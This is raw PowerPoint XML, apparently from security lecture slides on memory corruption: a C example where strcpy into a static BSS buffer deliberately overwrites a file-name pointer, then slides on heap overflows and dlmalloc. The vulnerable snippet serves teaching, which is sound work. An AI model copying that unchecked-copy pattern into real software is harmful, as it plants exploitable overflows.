              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/* These variables will be allocated in the BSS */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>static char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>buffer[MAX_STR_LENGTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>static char *filename; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>main(int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>[]) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = 0, count = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read_buf[BUFSIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  filename = argv[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>checkfile(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(buffer, argv[2]); // overwrites *filename</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>open(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, O_RDONLY);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  do {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      count = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read(fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      write(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>while(count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> == BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1227450568"/>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2980" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where is Overwritten: Heap Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022981" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The heap is the area of memory that is dynamically allocated through the “malloc” family of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>malloc(), calloc(), realloc(), free()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>new(), delete()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>functions that return dynamically allocated memory, e.g., strdup()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The heap grows towards higher memory addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory allocated on the heap survives the function that created it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1653118028"/>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80322" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Heap Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1080323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory management is done through in-band control structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>These control structures can be manipulated through heap overflows to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Architecture/OS-dependent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Some attacks depend on the library used for heap management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Doug Lea’s malloc library: dlmalloc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2024460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bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="4486336"/>
            <a:ext cx="1447800" cy="1171515"/>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2400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4375653" y="2213710"/>
            <a:ext cx="2938675" cy="2099438"/>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2400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Oval 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4822187" y="2571498"/>
            <a:ext cx="2088558" cy="1527208"/>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US" sz="2000" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1794693" y="4486335"/>
            <a:ext cx="5562491" cy="1062748"/>
          </a:xfrm>
          <a:prstGeom prst="round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2400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Can 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5346953" y="4628035"/>
            <a:ext cx="1039031" cy="858070"/>
          </a:xfrm>
          <a:prstGeom prst="can">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2400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2319456" y="2911895"/>
            <a:ext cx="1427357" cy="1062748"/>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2400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Cloud 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="220401" y="4628035"/>
            <a:ext cx="1456001" cy="921048"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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2400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5426034" y="4302633"/>
            <a:ext cx="871145" cy="10493"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3022636" y="3462950"/>
            <a:ext cx="2466388" cy="1598057"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2466388"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2130743"/>
              <a:gd name="connsiteX1" fmla="*/ 10496 w 2466388"/>
              <a:gd name="connsiteY1" fmla="*/ 2130743 h 2130743"/>
              <a:gd name="connsiteX2" fmla="*/ 1889148 w 2466388"/>
              <a:gd name="connsiteY2" fmla="*/ 2120247 h 2130743"/>
              <a:gd name="connsiteX3" fmla="*/ 2466388 w 2466388"/>
              <a:gd name="connsiteY3" fmla="*/ 461836 h 2130743"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2466388" h="2130743">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3499" y="710248"/>
                  <a:pt x="10496" y="2130743"/>
                  <a:pt x="10496" y="2130743"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1889148" y="2120247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466388" y="461836"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>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2400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="734669" y="3872304"/>
            <a:ext cx="4932774" cy="1346147"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4932774"/>
              <a:gd name="connsiteY0" fmla="*/ 1794862 h 1794862"/>
              <a:gd name="connsiteX1" fmla="*/ 4355535 w 4932774"/>
              <a:gd name="connsiteY1" fmla="*/ 1784366 h 1794862"/>
              <a:gd name="connsiteX2" fmla="*/ 4932774 w 4932774"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1794862"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4932774" h="1794862">
                <a:moveTo>
                  <a:pt x="0" y="1794862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4355535" y="1784366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4932774" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>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2400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Freeform 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6066263" y="3880177"/>
            <a:ext cx="1574290" cy="1172959"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1574290 w 1574290"/>
              <a:gd name="connsiteY0" fmla="*/ 1553448 h 1563945"/>
              <a:gd name="connsiteX1" fmla="*/ 713678 w 1574290"/>
              <a:gd name="connsiteY1" fmla="*/ 1563945 h 1563945"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1574290"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1563945"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1574290" h="1563945">
                <a:moveTo>
                  <a:pt x="1574290" y="1553448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="713678" y="1563945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>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2400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577643" y="3105159"/>
            <a:ext cx="889987" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
